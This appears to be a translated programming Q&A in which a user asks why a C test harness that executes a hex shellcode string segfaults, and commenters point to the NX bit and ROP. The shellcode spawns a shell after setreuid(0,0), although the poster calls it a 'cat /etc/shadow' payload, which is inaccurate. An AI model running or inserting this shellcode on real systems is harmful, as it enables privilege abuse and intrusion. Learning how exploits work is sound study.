【发布时间】:2016-01-16 01:40:33
【问题描述】:
我尝试通过 C 程序运行很多 shell 代码来测试它们。在这里
#include<stdio.h>
#include<string.h>
unsigned char code[] = "shell here";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
这里是shellcode的例子
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
"\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
"\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\
"\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"
(\bin\cat \etc\shadow) 运行后
gcc sctest.c -o out
./out
它只是给了我 shellcode 长度和分段错误 我已经尝试了很多不同的 shellcode 但一切都给了我段错误 我的dmesg |尾-1 [18440.783383] 测试[8768]:8049700 ip 08049700 sp bffff2ec 测试中的错误 15 [8049000+1000] 的段错误 我的 shellcode 有什么问题?
【问题讨论】:
-
现在应该是一个常见问题解答。在现代系统上,仅执行数据将不再起作用,请参见例如NX 位.
-
@FelixPalmen 谢谢!我花了很多时间试图理解缓冲区溢出,现在看来我已经准备好利用测试程序了
-
如今要利用缓冲区溢出,您将需要更复杂的技术,例如 ROP(面向返回的编程)
-
致反对者:我认为你不应该因为类似的事情不时出现,恕我直言,这将是一个很好的地方来澄清为什么 simple 开发只是跳到你的堆栈上的自己的代码将不再起作用。也许有人觉得有必要写一个好的答案......
-
@FelixPalmen 我已经读过 ROP 但我想从头开始
标签: c segmentation-fault shellcode